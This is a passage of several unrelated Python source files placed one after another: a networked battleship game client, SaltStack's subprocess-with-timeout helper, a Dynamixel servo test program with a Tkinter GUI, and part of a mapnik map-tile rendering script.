32: "Illegal_Special_Attack",
37: "Illegal_Game_Definition",
38: "Illegal_Ship_Placement",
39: "Illegal_Attack",
40: "Message_Not_Recognized",
41: "Not_Your_Turn",
43: "Not_In_Any_Game",
47: "Game_Join_Denied",
48: "Game_Preparation_Ended"
}
orientationCodes = {
Orientation.NORTH: "N",
Orientation.WEST: "W",
Orientation.SOUTH: "S",
Orientation.EAST: "E"
}
class ServerHandler:
"""
Communicates with the server.
Author:
Maximilian Hess <mail@maximilianhess.com>
"""
def setNickname(self, nickname):
"""
Resets the nickname.
Args:
nickname: the new nickname
"""
self.__sendMessage("nickname_set", {"name": nickname})
"""
Sent whenever the server noticed a change in the lobby.
number_of_clients:[number n];
The total number of clients currently connected to the server.
number_of_games:[number m];
The total number of open games on this server.
game_name_0:[name];...;game_name_m-1:[name];
The name of this game.
game_players_count_0:[1|2];...;game_players_m-1:[1|2];
The number of players currently in this game (1 or 2).
game_player_0_i:[identifier];...;game_player_m-1_i:[identifier]
For each game k from(0..m-1) games this maps game_players_count_k players to the game by use of their
identifier. The first value in the name of the parameter is the related game.
player_name_0:[name];...;player_name_n-1:[name];
MAY be an empty string, if no nickname was set prior to this report.
player_identifier_0:[identifier];...;player_identifier_n-1:[identifier];
Per-server-unique identifier (implementations may map any string as identifier)
"""
def __onUpdateLobby(self, params):
from backend import GameInformation, PlayerInformation
games = []
players = []
# extract players count and games count
playersTotal = int(params["number_of_clients"])
gamesTotal = int(params["number_of_games"])
"""
We have to make sure that all players in the game actually exist. Therefore players are extracted before the
games.
"""
# extract players
playersCounter = 0
for param, value in params.items():
if param.startswith("player_identifier_"):
# make sure that there are not more players than passed by players counter
if playersCounter >= playersTotal:
continue
playersCounter += 1
# extract counter and nickname if there is one...
if "player_name_" + param[18:] in params:
nickname = params["player_name_" + param[18:]]
players.append(PlayerInformation(value, nickname))
# extract games
gamesCounter = 0
for param, value in params.items():
if param.startswith("game_name_"):
# make sure that there are not more games than passed by games counter
if gamesCounter >= gamesTotal:
continue
gamesCounter += 1
counter = int(param[10:])
numberOfPlayers = int(params["game_players_count_" + str(counter)])
if numberOfPlayers > 2:
logging.error("Update_Lobby error: To many players.")
# find the players of this game
# validate that the players exist
player0 = params["game_player_" + str(counter) + "_0"]
game = GameInformation(value, player0)
if numberOfPlayers > 1:
player1 = params["game_player_" + str(counter) + "_1"]
game.players.append(player1)
games.append(game)
self.__backend.onLobbyUpdates(players, games)
def joinGame(self, gameId):
"""
Sends a joinGame request to the server.
Args:
gameId: the identifier of the game
"""
self.__sendMessage("game_join", {"name": gameId})
def createGame(self, gameId):
"""
Sends a new createGame request to the server.
Args:
gameId: the identifier of the new game
"""
self.__sendMessage("game_create", {"name": gameId})
def leaveGame(self):
"""
Sends a leaveGame request to the server.
"""
self.__sendMessage("game_abort", {})
def boardInit(self, ships):
"""
Sends the playing field to the server.
Args:
ships: a list of all ships
"""
params = {}
i = 0
for ship in ships:
params["ship_" + str(i) + "_x"] = str(ship.rear.x)
params["ship_" + str(i) + "_y"] = str(ship.rear.y)
params["ship_" + str(i) + "_direction"] = orientationCodes[ship.orientation]
i += 1
self.__sendMessage("board_init", params)
def attack(self, target):
"""
Sends an attack message.
Args:
target: the address of the field that is to be attacked
"""
self.__sendMessage("attack", {"coordinate_x": target.x, "coordinate_y": target.y})
def specialAttack(self, target):
"""
Special-attacks the given field.
Args:
target: the address of the bottom-left field
"""
self.__sendMessage("special_attack", {"coordinate_x": target.x, "coordinate_y": target.y})
def move(self, shipId, direction):
"""
Moves a ship on the own playing field.
Args:
shipId: the id of the ship
direction: the direction
"""
self.__sendMessage("move", {"ship_id": shipId, "direction": orientationCodes[direction]})
def sendChatMessage(self, msg):
"""
Sends a chat message.
Args:
msg: the message
"""
self.__sendMessage("chat_send", {"text": msg})
def capitulate(self):
"""
The player capitulates.
"""
self.__sendMessage("surrender", {})
def __receiveLoop(self):
while not self.__stopReceiveLoop:
try:
# read the first to byte to receive the byte size of the message
size = self.__sock.recv(2)
if not size:
continue
else:
try:
msg = self.__sock.recv(size[0] * 256 + size[1]).decode()
except:
logging.error("Failed to decode report: %s" % msg)
continue
messageType, params = self.__messageParser.decode(msg)
#logging.debug("Receive: {}".format(msg))
# validate that the status code exists
status = int(params["status"])
if status in reportCodes:
logging.debug("%s received: %s" % (messageType, reportCodes[status]))
if status is 15:
self.__backend.onIncomingChatMessage(params["author_id"], params["timestamp"], params["message_content"])
elif status is 16: # Update_Lobby
self.__onUpdateLobby(params)
elif status is 17: # Game_Ended
self.__backend.onGameEnded(params)
# game creation stuff
elif status is 19: # Game_Aborted
self.__backend.onGameAborted()
elif status is 23:
self.__backend.onCapitulate() # Surrender_Accepted
elif status is 27 or status is 47: # Successful_Game_Join
self.__backend.onJoinGame(status is 27) # or Game_Join_Denied
elif status is 28: # Successful_Game_Create
self.__backend.onCreateGame(True)
elif status is 29 or status is 38: # Successful_Ship_Placement
self.__backend.onPlaceShips(status is 29) # or Illegal_Ship_Placement
elif status is 37: # Illegal_Game_Definition
self.__backend.onIllegalGameDefinition()
elif status is 48: # Game_Preparation_Ended
self.__backend.gamePreparationsEndedResponse()
# game play stuff
# _ Begin_Turn
# - Successful_Move
# - Successful_Attack
# - Surrender_Accepted
# - Successful_Special_Attack
# - Illegal_Move
# - Illegal_Special_Attack
# - Illegal_Field
# - Illegal_Ship_Index
# - Illegal_Attack
# - Not_Your_Turn
elif status is 11 or status is 21 or status is 22 or status is 23 or status is 24 or status is 31 \
or status is 32 or status is 33 or status is 34 or status is 39 or status is 41:
self.__backend.onGamePlayUpdate(status)
# Begin_Ship_Placing
elif status is 18:
self.__backend.onBeginShipPlacing()
# field updates
elif status is 13:
self.__backend.onUpdateOwnFields(params)
elif status is 14:
self.__backend.onUpdateEnemyFields(params)
# bad error stuff
# - Message_Not_Recognized
# - Not_In_Any_Game (what? wtf? :D)
elif status is 40 or status is 43:
self.__backend.errorResponse(status)
else:
logging.debug("%s received with unknown status code." % (messageType))
except Exception as ex:
import traceback
traceback.print_exc(file=sys.stdout)
logging.error("Connection error: %s" % ex)
logging.error("Lost connection to server! Cleaning up...")
#self.__backend.onLostConnection()
def __sendMessage(self, type, params):
if not self.__connected:
logging.error("Not connected.")
return
msg = self.__messageParser.encode(type, params)
logging.debug("Sending message: %s" % (msg))
try:
self.__sock.send(msg)
except Exception as ex:
logging.error("Failed to send message: %s" % ex)
logging.error("Lost connection to server! Cleaning up...")
#self.__backend.onLostConnection()
def close(self):
"""
Closes the connection to the server.
"""
self.__stopReceiveLoop = True
def isConnected(self):
"""
Returns True if the client is connected to a server or False if not.
Returns: True if the client is connected to a server or False if not.
"""
return self.__connected
def disconnect(self):
"""
Disconnects from the server the client is currently connected to.
"""
self.__stopReceiveLoop = True
self.leaveGame()
try:
self.__sock.close()
logging.info("Disconnected")
except:
logging.error("Disconnecting failed!")
self.__connected = False
def connect(self, hostname, port):
"""
Connects to a server.
Args:
hostname: the hostname or IP address of the server
port: the port of the server
"""
try:
self.__sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__sock.connect((hostname, port))
self.__connected = True
self.__stopReceiveLoop = False
Thread(target=self.__receiveLoop).start()
logging.info("Connected to '%s:%s'" % (hostname, port))
return True
except:
logging.error("Failed to connect to server.")
return False
def __init__(self, backend):
self.__backend = backend
self.__messageParser = MessageParser()
self.__connected = False
|
timed_subprocess.py
|
# -*- coding: utf-8 -*-
'''
For running command line executables with a timeout
'''
from __future__ import absolute_import, print_function, unicode_literals
import shlex
import subprocess
import threading
import salt.exceptions
import salt.utils.data
from salt.ext import six
class TimedProc(object):
'''
Create a TimedProc object, calls subprocess.Popen with passed args and **kwargs
'''
def __init__(self, args, **kwargs):
self.wait = not kwargs.pop('bg', False)
self.stdin = kwargs.pop('stdin', None)
self.with_communicate = kwargs.pop('with_communicate', self.wait)
self.timeout = kwargs.pop('timeout', None)
self.stdin_raw_newlines = kwargs.pop('stdin_raw_newlines', False)
# If you're not willing to wait for the process
# you can't define any stdin, stdout or stderr
if not self.wait:
self.stdin = kwargs['stdin'] = None
self.with_communicate = False
elif self.stdin is not None:
if not self.stdin_raw_newlines:
# Translate a newline submitted as '\n' on the CLI to an actual
# newline character.
self.stdin = self.stdin.replace('\\n', '\n').encode(__salt_system_encoding__)
kwargs['stdin'] = subprocess.PIPE
if not self.with_communicate:
self.stdout = kwargs['stdout'] = None
self.stderr = kwargs['stderr'] = None
if self.timeout and not isinstance(self.timeout, (int, float)):
raise salt.exceptions.TimedProcTimeoutError('Error: timeout {0} must be a number'.format(self.timeout))
try:
self.process = subprocess.Popen(args, **kwargs)
except (AttributeError, TypeError):
if not kwargs.get('shell', False):
if not isinstance(args, (list, tuple)):
try:
args = shlex.split(args)
except AttributeError:
args = shlex.split(six.text_type(args))
str_args = []
for arg in args:
if not isinstance(arg, six.string_types):
str_args.append(six.text_type(arg))
else:
str_args.append(arg)
args = str_args
else:
if not isinstance(args, (list, tuple, six.string_types)):
# Handle corner case where someone does a 'cmd.run 3'
args = six.text_type(args)
# Ensure that environment variables are strings
for key, val in six.iteritems(kwargs.get('env', {})):
if not isinstance(val, six.string_types):
kwargs['env'][key] = six.text_type(val)
if not isinstance(key, six.string_types):
kwargs['env'][six.text_type(key)] = kwargs['env'].pop(key)
if six.PY2 and 'env' in kwargs:
# Ensure no unicode in custom env dict, as it can cause
# problems with subprocess.
kwargs['env'] = salt.utils.data.encode_dict(kwargs['env'])
args = salt.utils.data.decode(args)
self.process = subprocess.Popen(args, **kwargs)
self.command = args
def run(self):
'''
wait for subprocess to terminate and return subprocess' return code.
If timeout is reached, throw TimedProcTimeoutError
'''
def receive():
if self.with_communicate:
self.stdout, self.stderr = self.process.communicate(input=self.stdin)
elif self.wait:
self.process.wait()
if not self.timeout:
receive()
else:
rt = threading.Thread(target=receive)
rt.start()
rt.join(self.timeout)
if rt.isAlive():
# Subprocess cleanup (best effort)
self.process.kill()
def terminate():
if rt.isAlive():
self.process.terminate()
threading.Timer(10, terminate).start()
raise salt.exceptions.TimedProcTimeoutError(
'{0} : Timed out after {1} seconds'.format(
self.command,
six.text_type(self.timeout),
)
)
return self.process.returncode
|
test_program_for_Dynamixel_Protocol2_Xseries_ReubenPython2and3Class.py
|
# -*- coding: utf-8 -*-
'''
Reuben Brewer, reuben.brewer@gmail.com, www.reubotics.com
Apache 2 License
Software Revision C, 05/28/2021
Verified working on: Python 2.7 and 3.7 for Windows 8.1 64-bit and Raspberry Pi Buster (no Mac testing yet).
'''
__author__ = 'reuben.brewer'
from Dynamixel_Protocol2_Xseries_ReubenPython2and3Class import *
from MyPrintReubenPython2and3Class import *
import os, sys, platform
import time, datetime
import threading
import collections
###############
if sys.version_info[0] < 3:
from Tkinter import * #Python 2
import tkFont
import ttk
else:
from tkinter import * #Python 3
import tkinter.font as tkFont #Python 3
from tkinter import ttk
###############
###############
if sys.version_info[0] < 3:
from builtins import raw_input as input
else:
from future.builtins import input as input #"sudo pip3 install future" (Python 3) AND "sudo pip install future" (Python 2)
###############
##########################################################################################################
##########################################################################################################
def getPreciseSecondsTimeStampString():
ts = time.time()
return ts
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def TestButtonResponse():
global MyPrintReubenPython2and3ClassObject
global USE_MYPRINT_FLAG
if USE_MYPRINT_FLAG == 1:
MyPrintReubenPython2and3ClassObject.my_print("Test Button was Pressed!")
else:
print("Test Button was Pressed!")
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_update_clock():
global root
global EXIT_PROGRAM_FLAG
global GUI_RootAfterCallbackInterval_Milliseconds
global USE_GUI_FLAG
global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject
global DYNAMIXEL_X_OPEN_FLAG
global SHOW_IN_GUI_DYNAMIXEL_X_FLAG
global MyPrintReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
global SHOW_IN_GUI_MYPRINT_FLAG
if USE_GUI_FLAG == 1:
if EXIT_PROGRAM_FLAG == 0:
#########################################################
#########################################################
#########################################################
if DYNAMIXEL_X_OPEN_FLAG == 1 and SHOW_IN_GUI_DYNAMIXEL_X_FLAG == 1:
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
#########################################################
if MYPRINT_OPEN_FLAG == 1 and SHOW_IN_GUI_MYPRINT_FLAG == 1:
MyPrintReubenPython2and3ClassObject.GUI_update_clock()
#########################################################
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
#########################################################
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ExitProgram_Callback():
global root
global EXIT_PROGRAM_FLAG
global GUI_RootAfterCallbackInterval_Milliseconds
global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject
global DYNAMIXEL_X_OPEN_FLAG
global MyPrintReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
print("Exiting all threads in test_program_for_MyPrintReubenPython2and3Class.")
EXIT_PROGRAM_FLAG = 1
#########################################################
if DYNAMIXEL_X_OPEN_FLAG == 1:
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.ExitProgram_Callback()
#########################################################
#########################################################
if MYPRINT_OPEN_FLAG == 1:
MyPrintReubenPython2and3ClassObject.ExitProgram_Callback()
#########################################################
#########################################################
root.quit() #Stop the GUI thread
root.destroy() #Close down the GUI thread
#########################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def GUI_Thread():
global root
global GUI_RootAfterCallbackInterval_Milliseconds
################################################# KEY GUI LINE
#################################################
root = Tk()
#################################################
#################################################
TestButton = Button(root, text='Test Button', state="normal", width=20, command=lambda i=1: TestButtonResponse())
TestButton.grid(row=0, column=0, padx=5, pady=1)
root.protocol("WM_DELETE_WINDOW", ExitProgram_Callback) # Set the callback function for when the window's closed.
root.after(GUI_RootAfterCallbackInterval_Milliseconds, GUI_update_clock)
root.mainloop()
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
if __name__ == '__main__':
#################################################
#################################################
global my_platform
if platform.system() == "Linux":
if "raspberrypi" in platform.uname(): # os.uname() doesn't work in windows
my_platform = "pi"
else:
my_platform = "linux"
elif platform.system() == "Windows":
my_platform = "windows"
elif platform.system() == "Darwin":
my_platform = "mac"
else:
my_platform = "other"
print("The OS platform is: " + my_platform)
#################################################
#################################################
#################################################
#################################################
global USE_GUI_FLAG
USE_GUI_FLAG = 1
global USE_DYNAMIXEL_X_FLAG
USE_DYNAMIXEL_X_FLAG = 1
global USE_MYPRINT_FLAG
USE_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global SHOW_IN_GUI_DYNAMIXEL_X_FLAG
SHOW_IN_GUI_DYNAMIXEL_X_FLAG = 1
global SHOW_IN_GUI_MYPRINT_FLAG
SHOW_IN_GUI_MYPRINT_FLAG = 1
#################################################
#################################################
#################################################
#################################################
global GUI_ROW_DYNAMIXEL_X
global GUI_COLUMN_DYNAMIXEL_X
global GUI_PADX_DYNAMIXEL_X
global GUI_PADY_DYNAMIXEL_X
global GUI_ROWSPAN_DYNAMIXEL_X
global GUI_COLUMNSPAN_DYNAMIXEL_X
GUI_ROW_DYNAMIXEL_X = 0
GUI_COLUMN_DYNAMIXEL_X = 0
GUI_PADX_DYNAMIXEL_X = 1
GUI_PADY_DYNAMIXEL_X = 10
GUI_ROWSPAN_DYNAMIXEL_X = 1
GUI_COLUMNSPAN_DYNAMIXEL_X = 1
global GUI_ROW_MYPRINT
global GUI_COLUMN_MYPRINT
global GUI_PADX_MYPRINT
global GUI_PADY_MYPRINT
global GUI_ROWSPAN_MYPRINT
global GUI_COLUMNSPAN_MYPRINT
GUI_ROW_MYPRINT = 1
GUI_COLUMN_MYPRINT = 0
GUI_PADX_MYPRINT = 1
GUI_PADY_MYPRINT = 10
GUI_ROWSPAN_MYPRINT = 1
GUI_COLUMNSPAN_MYPRINT = 1
#################################################
#################################################
#################################################
#################################################
global EXIT_PROGRAM_FLAG
EXIT_PROGRAM_FLAG = 0
global root
global GUI_RootAfterCallbackInterval_Milliseconds
GUI_RootAfterCallbackInterval_Milliseconds = 30
global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject
global DYNAMIXEL_X_OPEN_FLAG
DYNAMIXEL_X_OPEN_FLAG = -1
global MyPrintReubenPython2and3ClassObject
global MYPRINT_OPEN_FLAG
MYPRINT_OPEN_FLAG = -1
global MainLoopThread_current_time
MainLoopThread_current_time = -11111
global MainLoopThread_starting_time
MainLoopThread_starting_time = -11111
#################################################
#################################################
################################################# KEY GUI LINE
#################################################
if USE_GUI_FLAG == 1:
print("Starting GUI thread...")
GUI_Thread_ThreadingObject = threading.Thread(target=GUI_Thread)
GUI_Thread_ThreadingObject.setDaemon(True) #Should mean that the GUI thread is destroyed automatically when the main thread is destroyed.
GUI_Thread_ThreadingObject.start()
time.sleep(0.5) #Allow enough time for 'root' to be created that we can then pass it into other classes.
else:
root = None
#################################################
#################################################
#################################################
#################################################
global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict
global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageCounter
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageCounter = -11111.0
global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTimeSeconds
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTimeSeconds = -11111.0
global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTopic
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTopic = ""
global Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageData
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageData = ""
DYNAMIXEL_X_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_DYNAMIXEL_X_FLAG),
("root", root),
("EnableInternal_MyPrint_Flag", 1),
("NumberOfPrintLines", 10),
("UseBorderAroundThisGuiObjectFlag", 0),
("GUI_ROW", GUI_ROW_DYNAMIXEL_X),
("GUI_COLUMN", GUI_COLUMN_DYNAMIXEL_X),
("GUI_PADX", GUI_PADX_DYNAMIXEL_X),
("GUI_PADY", GUI_PADY_DYNAMIXEL_X),
("GUI_ROWSPAN", GUI_ROWSPAN_DYNAMIXEL_X),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_DYNAMIXEL_X)])
DYNAMIXEL_X_setup_dict = dict([("SerialNumber", "FT3M9STOA"), #AlexB = FT2GXC48A
("NameForU2D2UserProvided", "Example Name U2D2"),
("SerialBaudRate", 4000000),
("ENABLE_GETS", 1),
("ENABLE_SETS", 1),
("MainThread_TimeToSleepEachLoop", 0.001),
("MotorType_StringList", ["XM540-W270-R"]),
("ControlType_StartingValueList", ["CurrentBasedPositionControl"]),
("Position_Deg_StartingValueList", [180.0]),
("Position_Deg_min", [0.0]),
("Position_Deg_max", [360.0]),
("Current_Percent0to1_max", [0.3]),
("StartEngagedFlag", [1]),
("GUIparametersDict", DYNAMIXEL_X_GUIparametersDict)])
#("RxThread_TimeToSleepEachLoop", 0.001),
#("TxThread_TimeToSleepEachLoop", 0.001),
#("MQTT_RxMessage_Queue_MaxSize", 1000),
#("MQTT_TxMessage_Queue_MaxSize", 1000)])
if USE_DYNAMIXEL_X_FLAG == 1:
try:
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject = Dynamixel_Protocol2_Xseries_ReubenPython2and3Class(DYNAMIXEL_X_setup_dict)
time.sleep(0.25)
DYNAMIXEL_X_OPEN_FLAG = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject, exceptions: %s" % exceptions)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1:
MyPrintReubenPython2and3ClassObject_GUIparametersDict = dict([("USE_GUI_FLAG", USE_GUI_FLAG and SHOW_IN_GUI_MYPRINT_FLAG),
("root", root),
("UseBorderAroundThisGuiObjectFlag", 0),
("GUI_ROW", GUI_ROW_MYPRINT),
("GUI_COLUMN", GUI_COLUMN_MYPRINT),
("GUI_PADX", GUI_PADX_MYPRINT),
("GUI_PADY", GUI_PADY_MYPRINT),
("GUI_ROWSPAN", GUI_ROWSPAN_MYPRINT),
("GUI_COLUMNSPAN", GUI_COLUMNSPAN_MYPRINT)])
MyPrintReubenPython2and3ClassObject_setup_dict = dict([("NumberOfPrintLines", 10),
("WidthOfPrintingLabel", 200),
("PrintToConsoleFlag", 1),
("LogFileNameFullPath", os.getcwd() + "//TestLog.txt"),
("GUIparametersDict", MyPrintReubenPython2and3ClassObject_GUIparametersDict)])
try:
MyPrintReubenPython2and3ClassObject = MyPrintReubenPython2and3Class(MyPrintReubenPython2and3ClassObject_setup_dict)
time.sleep(0.25)
MYPRINT_OPEN_FLAG = MyPrintReubenPython2and3ClassObject.OBJECT_CREATED_SUCCESSFULLY_FLAG
except:
exceptions = sys.exc_info()[0]
print("MyPrintReubenPython2and3ClassObject __init__: Exceptions: %s" % exceptions)
traceback.print_exc()
#################################################
#################################################
#################################################
#################################################
if USE_MYPRINT_FLAG == 1 and MYPRINT_OPEN_FLAG != 1:
print("Failed to open MyPrintReubenPython2and3ClassObject.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
if USE_DYNAMIXEL_X_FLAG == 1 and DYNAMIXEL_X_OPEN_FLAG != 1:
print("Failed to open Dynamixel_Protocol2_Xseries_ReubenPython2and3Class.")
input("Press any key (and enter) to exit.")
sys.exit()
#################################################
#################################################
#################################################
#################################################
print("Starting main loop 'test_program_for_Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_WoVa.")
MainLoopThread_starting_time = getPreciseSecondsTimeStampString()
while(EXIT_PROGRAM_FLAG == 0):
###################################################
MainLoopThread_current_time = getPreciseSecondsTimeStampString() - MainLoopThread_starting_time
###################################################
###################################################
if USE_DYNAMIXEL_X_FLAG == 1:
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.GetMostRecentDataDict()
if "RxMessageCounter" in Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict:
print("Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict: " + str(Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict))
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageCounter = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict["RxMessageCounter"]
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTimeSeconds = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict["RxMessageTimeSeconds"]
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageTopic = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict["RxMessageTopic"]
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageData = Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict["RxMessageData"]
if Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_MostRecentRxMessageDict_RxMessageData.lower() == "ping":
Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject.AddDataToBeSent(DYNAMIXEL_X_setup_dict["MQTT_Tx_topic_list"][0], "Received your message!", DYNAMIXEL_X_setup_dict["MQTT_Tx_QOS_list"][0])
else:
time.sleep(0.005)
###################################################
#################################################
#################################################
print("Exiting main program 'test_program_for_Dynamixel_Protocol2_Xseries_ReubenPython2and3ClassObject_WoVa.")
##########################################################################################################
##########################################################################################################
|
generate_tiles.py
|
#!/usr/bin/env python
#Source: https://trac.openstreetmap.org/browser/subversion/applications/rendering/mapnik/generate_tiles.py
from math import pi,cos,sin,log,exp,atan
from subprocess import call
import sys, os
from Queue import Queue
import threading
try:
import mapnik2 as mapnik
except:
import mapnik
DEG_TO_RAD = pi/180
RAD_TO_DEG = 180/pi
# Default number of rendering threads to spawn, should be roughly equal to number of CPU cores available
NUM_THREADS = 4
def minmax (a,b,c):
a = max(a,b)
a = min(a,c)
return a
class GoogleProjection:
def __init__(self,levels=18):
self.Bc = []
self.Cc = []
self.zc = []
self.Ac = []
c = 256
for d in range(0,levels):
e = c/2;
self.Bc.append(c/360.0)
self.Cc.append(c/(2 * pi))
self.zc.append((e,e))
self.Ac.append(c)
c *= 2
def fromLLtoPixel(self,ll,zoom):
d = self.zc[zoom]
e = round(d[0] + ll[0] * self.Bc[zoom])
f = minmax(sin(DEG_TO_RAD * ll[1]),-0.9999,0.9999)
g = round(d[1] + 0.5*log((1+f)/(1-f))*-self.Cc[zoom])
return (e,g)
def fromPixelToLL(self,px,zoom):
e = self.zc[zoom]
f = (px[0] - e[0])/self.Bc[zoom]
g = (px[1] - e[1])/-self.Cc[zoom]
h = RAD_TO_DEG * ( 2 * atan(exp(g)) - 0.5 * pi)
return (f,h)
class RenderThread:
def __init__(self, tile_dir, map_obj, q, printLock, maxZoom):
self.tile_dir = tile_dir
self.q = q
self.m = map_obj
self.printLock = printLock
# Obtain <Map> projection
self.prj = mapnik.Projection(self.m.srs)
# Projects between tile pixel co-ordinates and LatLong (EPSG:4326)
self.tileproj = GoogleProjection(maxZoom+1)
def render_tile(self, tile_uri, x, y, z):
# Calculate pixel positions of bottom-left & top-right
p0 = (x * 256, (y + 1) * 256)
p1 = ((x + 1) * 256, y * 256)
# Convert to LatLong (EPSG:4326)
l0 = self.tileproj.fromPixelToLL(p0, z);
l1 = self.tileproj.fromPixelToLL(p1, z);
# Convert to map projection (e.g. mercator co-ords EPSG:900913)
c0 = self.prj.forward(mapnik.Coord(l0[0],l0[1]))
c1 = self.prj.forward(mapnik.Coord(l1[0],l1[1]))
# Bounding box for the tile
if hasattr(mapnik,'mapnik_version') and mapnik.mapnik_version() >= 800:
bbox = mapnik.Box2d(c0.x,c0.y, c1.x,c1.y)
else:
bbox = mapnik.Envelope(c0.x,c0.y, c1.x,c1.y)
render_size = 256
self.m.resize(render_size, render_size)
self.m.zoom_to_box(bbox)
if(self.m.buffer_size < 128):
self.m.buffer_size = 128
# Render image with default Agg renderer
im = mapnik.Image(render_size, render_size)
mapnik.render(self.m, im)
im.save(tile_uri, 'png256')
def loop(self):
while True:
#Fetch a tile from the queue and render it
r = self.q.get()
if (r == None):
self.q.task_done()
break
else:
(name, tile_uri, x, y, z) = r
exists= ""
if os.path.isfile(tile_uri):
exists= "exists"
else:
self.render_tile(tile_uri, x, y, z)
bytes=os.stat(tile_uri)[6]
empty= ''
if bytes == 103:
empty = " Empty Tile "
self.printLock.acquire()
print name, ":", z, x, y, exists, empty
self.printLock.release()
self.q.task_done()
def render_tiles(bbox, map_obj, tile_dir, minZoom=1,maxZoom=18, name="unknown", num_threads=NUM_THREADS, tms_scheme=False):
print "render_tiles(",bbox, map_obj, tile_dir, minZoom,maxZoom, name,")"
# Launch rendering threads
queue = Queue(32)
printLock = threading.Lock()
renderers = {}
for i in range(num_threads):
renderer = RenderThread(tile_dir, map_obj, queue, printLock, maxZoom)
render_thread = threading.Thread(target=renderer.loop)
render_thread.start()
#print "Started render thread %s" % render_thread.getName()
renderers[i] = render_thread
if not os.path.isdir(tile_dir):
os.mkdir(tile_dir)
gprj = GoogleProjection(maxZoom+1)
ll0 = (bbox[0],bbox[3])
ll1 = (bbox[2],bbox[1])
for z in range(minZoom,maxZoom + 1):
px0 = gprj.fromLLtoPixel(ll0,z)
px1 = gprj.fromLLtoPixel(ll1,z)
# check if we have directories in place
zoom = "%s" % z
if not os.path.isdir(tile_dir + zoom):
os.mkdir(tile_dir + zoom)
for x in range(int(px0[0]/256.0),int(px1[0]/256.0)+1):
# Validate x co-ordinate
if (x < 0) or (x >= 2**z):
continue
# check if we have directories in place
str_x = "%s" % x
if not os.path.isdir(tile_dir + zoom + '/' + str_x):
os.mkdir(tile_dir + zoom + '/' + str_x)
for y in range(int(px0[1]/256.0),int(px1[1]/256.0)+1):
# Validate x co-ordinate
if (y < 0) or (y >= 2**z):
continue
# flip y to match OSGEO TMS spec
if tms_scheme:
str_y = "%s" % ((2**z-1) - y)
else:
str_y = "%s" % y
tile_uri = tile_dir + zoom + '/' + str_x + '/' + str_y + '.png'
# Submit tile to be rendered into the queue
t = (name, tile_uri, x, y, z)
try:
queue.put(t)
except KeyboardInterrupt:
raise SystemExit("Ctrl-c detected, exiting...")
# Signal render threads to exit by sending empty request to queue
for i in range(num_threads):
queue.put(None)
# wait for pending rendering jobs to complete
queue.join()
for i in range(num_threads):
renderers[i].join()
"""
if __name__ == "__main__":
home = os.environ['HOME']
try:
mapfile = os.environ['MAPNIK_MAP_FILE']
except KeyError:
mapfile = home + "/svn.openstreetmap.org/applications/rendering/mapnik/osm-local.xml"
try:
tile_dir = os.environ['MAPNIK_TILE_DIR']
except KeyError:
tile_dir = home + "/osm/tiles/"
if not tile_dir.endswith('/'):
